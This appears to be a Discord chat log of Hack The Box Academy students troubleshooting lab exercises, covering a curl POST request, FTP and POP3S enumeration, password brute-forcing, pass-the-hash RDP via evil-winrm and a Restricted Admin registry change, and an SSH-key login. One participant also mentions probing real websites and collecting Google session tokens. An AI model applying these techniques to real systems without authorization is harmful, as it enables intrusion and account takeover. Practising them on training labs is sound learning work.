curl -X POST -d '{"search":"london"}' -b 'PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1' -H 'Content-Type: application/json' http://<SERVER_IP>:<PORT>/search.php is what the module shows. but we replace london with flag
Did you get the session ID from the site, or from the section.
where is this missing '?
not sure why it's not picking it up at the content-type
-H "Content-Type: 'application/json'"
Oh wait
curl -X POST -d '{"search":"Flag"}' -b 'PHPSESSID=68v86efjbp2eaen62v4uuco0f1t' -H 'content-Type: application/json' http://94.237.63.93:30436/search.php
wait
thats my old one
1 sec
curl -X POST -d '{"search":"flag"}' 'PHPSESSID=ji4kcovqpslp8h79627945dbcq' -H 'Content-Type: application/json' http://94.237.63.93:30436/search.php
😦 this shouldnt be that difficult
Try:
curl -X POST -d '{"search":"flag"}' -H 'PHPSESSID=ji4kcovqpslp8h79627945dbcq Content-Type: application/json' http://94.237.63.93:30436/search.php
got a port number error that time
Or
curl -X POST -d '{"search":"flag"}' -H 'PHPSESSID=ji4kcovqpslp8h79627945dbcq' -H 'Content-Type: application/json' http://94.237.63.93:30436/search.php
What do you mean "port error"
URL rejected: Port number was not a decimal number between 0 and 65535
Which module/chapter are you doing?
Only other thing I can suggest at this point is to put the URL inside single quotes
or put the URL at the start
oh yes a whole number, enough for today 😄
im doing web requests page 7
POST
Works for me
Possibly try rebooting the target for a different IP and sessid
yea idk whats up....
I feel like an idiot.. idk why i cant do this
could it be cause im using windows console and not the embedded VM?
im ... stupid
that was my issue
i had run out of sessions for academy and bought some blocks and it worked
That's not gonna matter for spawning targets
For using the pwnbox vm: yes
weird. well i used the embedded VM and it worked right away
The issue was windows
A lot of these commands are assuming linux
I see that now
So likely the windows version has some differences in syntax
you'd have to do like curl --help in the windows cmd to see what flags line up
But imo just set up your own vm
¯\_(ツ)_/¯
i have one, but it was giving me issues yesterday too
If you're using windows, curl is an alias for IWR
"Giving issues" vague
Yo Marcie, so I found the user for the Attacking CS Medium lab on the port you told me, so I proceeded to bruteforce pretty much everything with pws. list be it ssh,ftp on 2121 and even 30021. I thought that having the domain inlane--- would assume there would be an email with the UserIFound@inlane---.htb
Any tips?
Besides the bruteforce.
So now I will be trying rockyou.txt I suppose.
Username should be lowercased
2121 is the initial vector
Strange.
Was getting weird errors, then I switched to pwn box and it was fine
If it comes up again I’ll holler
But again thank you for dealing with me Marcie I appreciate it
Don't just @ me.
Likely it's user error
🤙 ok
so after hours I am in the last step for skill assessment for tunnelling this is what I found in the domain controller machine what should I do now please
Check all the ports
are there more??
One of em should have a vulnerability I guess
No I’m assuming one of the ones shown has a crack in it
There's no advanced hacking skills required
I dunno which service to interact in the last hop
445 would be the port
The last port does ? How can you tell ?
wait
Rdp to the last host you have user access to
I was gonna say that lol had no clue why that one spoke to me
Smb
I remember it from one of the intro modules in lab
Since you haven't done this module, please try not to make assumptions
Will do
This module is related to pivoting and moving through an ad network
Using exposed creds and such to move through it
There's no real advanced cracking or skill required except enumeration
I mean smb would just be smbclient
But also just rdp
You have a user on the last host
Just rdp and check available files
How is that something you are able to tell just by looking at the list of ports?
I know this based on the info they've given
The ports list is a bunch of normal windows ad ports
failed on both systems
You should have a host you have with that user
I definitely recall rdp for this
Check the files
Either under network or this pc
I recall this being like really dumb
But iirc v* is the last user you get
yes I checked that but its asking pass
Enter user pass and it doesn't work?
DisableRestricted admin?
I do not have the pass
Is that covered?
I only have the hash
yes
which module is he on
Oh if that's covered in the module...
You have rpc ports for that
Evil-winrm
get in the cmd and add the disable restricted admin, then go to the registry editor control/lsa
^ what marcie said
This is the pivoting module skill assessment
ooo, that's my next module
I just recall it being fairly straightforward
still stuck on the medium lab
I did that , but uh...no success, reading through my ftp section rn.
I must be missing smth.
I don't recall Simon being the user
rdesktop won't give you up
that's what I found on that open port.
I have this much time
Huh. Thought it was ceil
Lemme send u what I found
Go for it
A banner.
I could absolutely be misremembering
That's the first. When I got anonymous login I found a file named simon.
Which I couldn't get.
Is it a file?
USER'S ftp server
It was a strange response, not an ordinary file or smth.
When I got it via wget it showed the banner.
Could be a dir btw
Maybe try changing directories to this weird "simon" file :)
Bruh.
But also
Was I right? 
Lemme try
I think you are 😄
I honestly haven't touched this module in a minute
So I'd have to spin it up and check with pwnbox
It's also entirely possible they changed it since I last did it
Dude, I have no idea what I have in my mind about CPTS when I miss smth as simple as that
Maybe it's 2 am and that's why
Go sleep
wut
Oh, nah I bought a new pc and had to set it up and everything.
So I had to transfer my shi.
I have a folder where I keep my HTB experience with every skill assessment/lab that I have completed and the whole process.
I had to make sure that doesn't get lost else I will cry.
what point would there be if it was easy
ima refer u to smth u said
:)))
I found the flag but it's under root
Evaluate running services
This module has def changed since I last did it
Yeah, I logged in via SSH and pop3, nothing.
It appears that the message which gave an ssh key was in pop3 and ftp as well as in ssh.
Pop3s
I will try that, completely forgot about 995.
What's the difference anyway?
More secure?
Yes
And sometimes mail services will not allow interaction with the insecure port
Connection closed by foreign host...sigh.
I need a gun.
Oh wait I wrote pop3s instead of 995
Nevermind, same sh.
Now, there was another way.
Don't forget to log in with
USER
PASS
That I saw in the footprinting.
Likely using browser
Yeah, it kicks me right when I enter the user.
USER username
I can try with the user@domain
yep that's what i did to connect
oH bruh, I use telnet
You need to use openssl for the secure ports
That's why
Also you'll need to replace spaces with newlines
Yup, same message nonetheless.
I tried password reuse, nothing.
Bash history is clean.
I did try the ssh key for the root but requires root password.
Even though I did chmod 600
Read my message
Which one.
Replace spaces with newlines
Oh...
In the SSH Key?
I knew smth was wrong when there were whitespaces.
Still error, can I send you the SSH key, it should be fine?
It works fine for me after replacing the spaces in the ssh key with a new line
It should be 16 lines.
As long as it starts -----OPEN and -----END
Yup.
Yes
Hi!
Hi.
Hi
Lemme retry.
I love that sentence
Ty
CPTS is the certified Penetration Testing Specialist Certification
What does it do?
it's a certification exam akin to OSCP
CBBH would be the web based certification exam
https://academy.hackthebox.com/exams/2
Yup, same, I will change it to mod 666.
Although it wouldn't change much.
600 would be the technically correct perms
or 660
i had an account for it
Hm.
but i'm able to login just fine with that ssh key
but can't log in
app.hackthebox.com and academy.hackthebox.com are separate logins btw
og
Same, it worked now.
oh
I will try for the root with the same sshkey.
don't need to
How so?
ls
flag requires root,
does it really though? 😉
But when I SSHed it had root root
ls -la
Exactly,
check perms
it is rw-r--r-- perms
meaning it's readable; only root can write it
Yup, thanks for that.
Go to bed sirg get some rest
skill issue
@fathom pendant Of the number of questions you've answered, how many of them are really basic stuff?
a fair bit
Everyone has to start from somewhere.
but also this one tbh threw me for a sec because they actually changed this lab
sir, i am at common services
40% cpts
May I blame it all on the fact that it is 3 am.
Ima test websites security Cus im bored:(
but i'm like 99% sure that originally that skill assessment had at first the hint give you a username; then they just flat out gave you the username/pw; and now it's completely diff
this isn't a gen chat
Oh
You ever do one of the easier boxes, get stuck on a very basic step, then go "oh, it's this simple thing I completely forgot about?"
Yuh
that's like 90% of the easy skill assessments
I tried to download a directory bruh
Wdym?
I forgot to check perms on a file
I'm astounded by the few who are continuously able to get blood on the boxes.
It's that easy sh that throws me away
they likely developed some scripts that apply to HTB stuff
A site protector Has its own website surprising me
See, I tried to download a directory, thinking it was a file.
Oh dang.
I didn't even see the drwx.
also a lot of times if they've pwned boxes from that same creator; they'll likely have an idea of what the creator hides
lol I can download anything like everything it can’t take my device over even if it’s a exe file
we don't care li'l bro
I saw root root on a file and thought I required root perms, so I thought of digging back for password reusage so I can escalate.
That's called Linux, it's all fun until it opens wine
Yk what, Ima get CPTS and stay noob hacker.
So I can troll.
share pls
lol
it was my idea, you stole my idea and since i'm american I can sue you for infringing on my ideas
I jsut found out u can get website Tokens..
eJ tokens?
Like get access to Control the website
website tokens have long since been a thing
Nah that's domain controller.
DC only applies to AD environments my dude
I am tryna sound smart y y ruining it
what’s JSONP Callback??
don't play fire with stupid; you'll lose that battle quick
aight, fr gnight, Ima do the hard lab myself
btw i believe it's a different simon; so the pw might not work
attack the lab as if it's a separate machine
Will do.
that's what 100% clued me into the med lab being changed
yo, i am doing the second skill assessment for attacking common applications and on the question of: What is the FQDN record of the third domain.
If i try using dig for this i cant seem to get anything
Tried different stuff but yeah a hint here would be nice. I have completed all the other questions on the assessment
I found something called _Secure-1-PSID
Yk, whats strange, months ago I felt that I would be using exploits and stuff. I doubt that IRL anyone would have passwords in a txt file.
Like hacking?
Whatever it is.
I think one of the things in a previous module has some bruteforce tools
I would recommend keeping this channel relevant to the modules in HTB
ok Mr mod
dude this has nothing to do with academy modules
yeah but it's weird. Since there are no dns ports open and i get only connection refused
I just found it idk what it is
My sister in Christ we are both mods